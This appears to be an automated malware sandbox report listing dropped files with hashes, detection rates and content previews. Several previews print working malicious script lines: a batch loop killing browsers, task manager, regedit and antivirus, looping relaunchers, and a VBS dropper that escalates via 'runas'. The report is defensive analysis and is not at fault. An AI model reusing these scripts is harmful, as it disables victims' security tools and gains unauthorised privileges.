                          Category:dropped
                          Size (bytes):50
                          Entropy (8bit):4.358562939644916
                          Encrypted:false
                          SSDEEP:3:yGh/HyGch/HyCRen:ykyGyyCRe
                          MD5:FAF4749B646B63A1DF551FE0141727CB
                          SHA1:EAB00A1525581A6823D7216F3EC019012BAB619F
                          SHA-256:6B2831B0C5BCAC2F5F57AAB8028CD486F4C6C26364A70ECC76FF71D7F710049C
                          SHA-512:28EEA78034E7B6D09A32D9985D2731EC582C232425EE4D81A52D65AA5F3618F8D463C52CAA881496116C47433140E7B1C79DC6ADD6B88EF2650AC7AE8CBFB67A
                          Malicious:false
                          Reputation:unknown
                          Preview::A.."C:\BUG32\jsc.exe".."C:\BUG32\jsc.exe"..goto A
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):204800
                          Entropy (8bit):7.749648146387286
                          Encrypted:false
                          SSDEEP:3072:VUCDC6euEiNV49JNEgwXUx/ZF8xHozjfNLC6CzSpYCDCDCDCDCDCDCDCY:yKXRDgwiYyLYtLKKKKKKK
                          MD5:367B7179319F010F84B37ACFC65082BA
                          SHA1:3C74537066CC79CF1505E9C79FE321B53ED3AB16
                          SHA-256:035CC52A0ABB363A463E21787DC061A3B42376BA0B082BC9C2D7E2399365862F
                          SHA-512:D282FAC9692B3FF1AB838B1A9A30727F7E166F92923503C65BCA3BEF85E75B300A1973D6FC1739F04F4058E743ABDEC29A08ECF1BDA4730A02DCDAEB13749833
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 46%
                          • Antivirus: Virustotal, Detection: 65%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.Y.........."...0..............4... ...@....@.. ....................................`..................................3..O....@.......................`......P3............................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................4......H........;.............. W..0..............................................(.... .....(.... ....(....(....&*...(.... .....(.... ....(....(....&*...(.... .....(.... ....(....(....&*.0..:.........o.........+#..o.....(.....r...pr'..p...(....&+...(.....*...0..{..........}......}......}......}.....s....}.....s....}......}.....(.......(...... .....(.......{....o....o.......{....o....( ....*..*...0............{....rC..po!.....{....o".....{....o#.....{.....($.....Xo%.....{.....(&....
                          Process:C:\Windows\System32\wscript.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):398
                          Entropy (8bit):4.174042594897034
                          Encrypted:false
                          SSDEEP:12:nWcfWgbEnW+WpWYuAA7WPr/WYk/WuW4WaWymWZ7WrEJfmWmNv:n3fvyfMjul7Q/7k/5738m7SE9mRNv
                          MD5:9E116F6EB010B8BFF3211210E5B979FE
                          SHA1:D81B32E7845A614A38E3902239CE978C908AF8C2
                          SHA-256:CDEABD549E74E525E1BAAD3252246209667967399563F8BE2B3275C8C276FC3E
                          SHA-512:FD5687206D013577577D68C65215CD4636A616B83E12E5ACBAE0B619E543FF06F67D3881C8C85D0E6E0EE13DD7F5E20246B9EDAFEA26CB0D6BB39EE4362966B6
                          Malicious:false
                          Reputation:unknown
                          Preview:taskkill /f /im chrome.exe..taskkill /f /im opera.exe..taskkill /f /im iexplore.exe..taskkill /f /im msedge.exe..taskkill /f /im microsoftedge.exe..taskkill /f /im notepad.exe..taskkill /f /im firefox.exe..taskkill /f /im mspaint.exe..taskkill /f /im skype.exe..taskkill /f /im bing.exe..taskkill /f /im eset.exe..taskkill /f /im edge.exe..taskkill /f /im taskmgr.exe..taskkill /f /im regedit.exe..
                          Process:C:\Windows\System32\cmd.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):0
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:6144:pawSBkisDOva2NZJAeQ9CZw8LLbkSsX+zIiJ91wuwxC9Io3/nUis7OHQeFRBgOAd:r
                          MD5:B4C7AC850CDA9B877C948FB2D83A322E
                          SHA1:F7EAC4DF8B6FDCB5625FF0FDEE09C32599FC2D0E
                          SHA-256:43ED8E176C9FEFD8CC7AAE1E7C2D151B25DB494AC68B888B773767ABD5412402
                          SHA-512:1A6DE6B525DBA751857E7D109D37F753595A889A414CCF6D4C15196C90B0AC28E4D2647772FCB1BF4A8D17DB300759807FE2746EB47FF56D2DCC5B4DCB9D99D9
                          Malicious:false
                          Reputation:unknown
                          Preview:C:\Users\user\.ms-ad..C:\Users\user\3D Objects..C:\Users\user\AppData..C:\Users\user\Application Data..C:\Users\user\Contacts..C:\Users\user\Cookies..C:\Users\user\Desktop..C:\Users\user\Documents..C:\Users\user\Downloads..C:\Users\user\Favorites..C:\Users\user\Links..C:\Users\user\Local Settings..C:\Users\user\Music..C:\Users\user\My Documents..C:\Users\user\NetHood..C:\Users\user\OneDrive..C:\Users\user\Pictures..C:\Users\user\PrintHood..C:\Users\user\Recent..C:\Users\user\Saved Games..C:\Users\user\Searches..C:\Users\user\SendTo..C:\Users\user\Start Menu..C:\Users\user\Templates..C:\Users\user\Videos..C:\Users\user\AppData\Local..C:\Users\user\AppData\LocalLow..C:\Users\user\AppData\Roaming..C:\Users\user\AppData\Local\Adobe..C:\Users\user\AppData\Local\Application Data..C:\Users\user\AppData\Local\CEF..C:\Users\user\AppData\Local\Comms..C:\Users\user\AppData\Local\ConnectedDevicesPlatform..C:\Users\user\AppData\Loc
                          Process:C:\Windows\System32\wscript.exe
                          File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 44100 Hz
                          Category:dropped
                          Size (bytes):352880
                          Entropy (8bit):4.840131508665485
                          Encrypted:false
                          SSDEEP:6144:HABKuwDidKkReUkDJJrdimzgvFSVf6S5X03V4n8:sKuwDcKeeUkjUmaoVyUX0FQ8
                          MD5:77BB6C1E12D47EFF938D2EFB28E7FB9D
                          SHA1:7F4FC62FDE5EB3BEB6DEF399AB525380CC4B8965
                          SHA-256:926E24D85E847789A62F8AE3DAE7AF494FF329893A9A3C133B073B4B9CDDBCCB
                          SHA-512:A19AFAA90822B0081D51612AEA2A41992F5C4EB2F39767CF9ED96B1FFC88BBB4203B4A04E9942C2CEF445866817F56802EF099BA4F034949861DD3DA6C4B3B2F
                          Malicious:false
                          Reputation:unknown
                          Preview:RIFFhb..WAVEfmt ........D.............LIST....INFOISFT....Lavf55.19.100.data b.......................................... ...........................$...............&.................................................................................................................................................................................................................................................................................................!.-...............$..."...................................'............... ...........6...............#...........................................................................................................#...............?....................................................... ...........O.-.H...........+.".........................7.........$.....J...............$.........`.J...!.....P.....g.............".............0.u...........?.(.........0.&...............+.(...............2.....'.....................4.!...................U.+.....
                          Process:C:\Windows\System32\wscript.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):81
                          Entropy (8bit):4.888629323605183
                          Encrypted:false
                          SSDEEP:3:kWAIyGuIVCgBBYSLNLTARen:fAIyxI7OSJnARe
                          MD5:00CF4877A187A307971F4FD650AC8C11
                          SHA1:2569ED07CBE4AB78D12CBA571E83E1E1A7FC59B6
                          SHA-256:8FDD9F0AA62B3E365850970187311192F5E101768EDAD88B550CC39A6909BDCE
                          SHA-512:039E90E66ED5FA8CD39A7525D1B7B0EBA85B32D4954A41E60A113B61D3E1FDA9B2356975A587873CA54CEF129A894AC19E2D1C6D59E20A182412861B1205D4B9
                          Malicious:false
                          Reputation:unknown
                          Preview::A..wscript.exe "C:\BUG32\emptyone.vbs"..wscript.exe "C:\bug32\admin.vbs"..goto A
                          Process:C:\Windows\System32\wscript.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):277
                          Entropy (8bit):5.075742538505295
                          Encrypted:false
                          SSDEEP:6:fG0tz6Es9BFLNdMoPcu0LuGMau5WIePrJ:fKDdpUWxan9zJ
                          MD5:FE18D2D82DBFB9226CC424C0164252BE
                          SHA1:E058B9EFF08E3A7370D49D78634C8C201DB8F0E5
                          SHA-256:7922E452D5166BFA8E32E9392CB3B123CFFC54B03218D8FCB584F5A2D97A0B96
                          SHA-512:6540372F658F6397EB836D979B4208C6507B4AAFDB8EACCE772D645CDC1F418690E50C275C0A71C305F0A9201688BBE955FB5023AFF223F18C0E83E32735C996
                          Malicious:true
                          Reputation:unknown
                          Preview:set objShell = createobject("Shell.Application")..dim buhu.. buhu="C:\bug32\jaq.vbs" ..set x = createobject("Wscript.shell")..x.run "C:\BUG32\js.bat",0..x.run "C:\BUG32\nokill.bat",0.. ObjShell.ShellExecute "wscript.exe", """" & buhu & """ RunAsAdministrator", , "runas", 1 ..
                          Process:C:\Windows\System32\wscript.exe
                          File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 44100 Hz
                          Category:dropped
                          Size (bytes):901200
                          Entropy (8bit):7.003112173936088
                          Encrypted:false
                          SSDEEP:24576:qk5l4ageFsL89yoRi1D+wUJA0YKv10OJ4UG:qk0aCLkfAZKt0OJT
                          MD5:95AA92415C37BBF7E649D406F159853D
                          SHA1:FF37BC8B297A81E78D31E27559A9C4E1E1307275
                          SHA-256:B9D6D86686222ADDC0048BDB7BE1E5531A1D4B48D8D65E156E180E94035C3D02
                          SHA-512:6EFA300352E64DA46D343DAD5EF2D810C7EE0B07DC9B7B1B8968EF9C8A4446ED4A17064194DFC44FBE16C95972E4866EB1042E34A2528B782F0BA0EE582FAFED
                          Malicious:false
                          Reputation:unknown
                          Preview:RIFFH...WAVEfmt ........D.............LIST....INFOISFT....Lavf55.19.100.data............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PNG image data, 1366 x 768, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):53478
                          Entropy (8bit):7.826606752307044
                          Encrypted:false
                          SSDEEP:1536:4TRt50i/bemkC9EqIrmljVF5BE8F88EwQngGYYLPniT:4v5/SHWE9iljVFnrK8EwQnJtLQ
                          MD5:19D522CD15CC73B932F1AB4252D9D624
                          SHA1:27C0F04A38AF403F84E1F2DC6965206E8B3F9B73
                          SHA-256:78C21952F543624FE51F92BC2F35B17F652E4FED695228AA530370FF05083A04
                          SHA-512:8C43E39A8AFFC34743B4E1521F85F578EA2B3B6F455D20983746EC4EB1F28F6F706889BA3ED1551B9A14AB3DC9723E719A48077DE9FBD06DD77EE0F41B064A9C
                          Malicious:false
                          Reputation:unknown
                          Preview:.PNG........IHDR...V.........@\......sRGB.........gAMA......a.....pHYs..........o.d...{IDATx^......y...M...{U...{.....u$.H ..D...QD....n.......N..8.Ir.?..=.{..g.]-;....}...V...+.ovf,..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1.>O}P^..b.1..c.......;..c.1..c.#....K...c.1..c..$s......_..e.1..c.1...)........}..c.1..c....y...}....}.a.1..c.1...5.....e.1..c.1.X..i.+...c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.......+..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1...o6..c.1..c.1..c.1..c.1..c.1..js...v..]..R.~r.vp,.sA.I..c.1..c:5...@.L]k.N..O+u..>].I....$c.1..c.1....O..i...C.......H...}.
                          Process:C:\Users\user\AppData\Local\Temp\aJEWGt.exe
                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19456
                          Entropy (8bit):6.5904467374365865
                          Encrypted:false
                          SSDEEP:384:1FXSMXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:6sQGPL4vzZq2o9W7GsxBbPr
                          MD5:5C445FA7CAE930A77F52D55A0BF77818
                          SHA1:A529E492DD9CE327661485BF837E13823AE4DD49
                          SHA-256:F26D727C5EBD3ED5CBE9E8EC9631A0DC0DADF4A0D53492B9E88E32EE30936BEC
                          SHA-512:00880831DB84074AAF3729AD43992D6AD28DC906179871E698A531491065FB96B983CB4B14720A709B7533787F93AA85CF8CFFC56133CFE7E403034EE6C4D803
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:unknown
                          Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                          Process:C:\Users\user\AppData\Local\Temp\aJEWGt.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):2389504
                          Entropy (8bit):6.731348503597788
                          Encrypted:false
                          SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                          MD5:15AE28F8C3F94F4CC0DBB6494C56E710
                          SHA1:3611D5A08EA8D68C63FF8763FED1F4D585335800
                          SHA-256:617F1F8242E03B183F8156F181E3C23956A561DC15C3CAD64A9909C2DCC1945C
                          SHA-512:050C1E398C1A8EAC70370D51846E9515029559AF020F9BB1DD2E6DFBD1C6855E8E086951F35754C668CF8A04EC882C8005CBB3BED202EC02AFB3D68A13B94D55
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\aJEWGt.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):31744
                          Entropy (8bit):6.366652104464679
                          Encrypted:false
                          SSDEEP:768:uWQ3655Kv1X/qY1MSdLQQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdL7GCq2iW7z
                          MD5:D2D5AB800204B9E0202AF65B8FFFE08B
                          SHA1:7CA7A63A9619C9501A5C3B9BE89C884B33200270
                          SHA-256:C998D4B02B6B2D2914E832B50D99B2AA8CEFE6CE382755FD9639B46198E27AD5
                          SHA-512:7402B0DF141CF45B437CEA1D8E64A458B4C676BDCBEBFFC8A98D6EBCDDEDE3BB184D5963D9006FFF02ADCCEAD42854F12A175D8A8A4D2748B92AD6CC391A2D8E
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 35%
                          • Antivirus: Virustotal, Detection: 49%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 35%
                          • Antivirus: Virustotal, Detection: 49%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 35%
                          • Antivirus: Virustotal, Detection: 49%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 35%
                          • Antivirus: Virustotal, Detection: 49%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 35%
                          • Antivirus: Virustotal, Detection: 49%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 35%
                          • Antivirus: Virustotal, Detection: 49%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 35%
                          • Antivirus: Virustotal, Detection: 49%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 35%
                          • Antivirus: Virustotal, Detection: 49%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Antivirus:
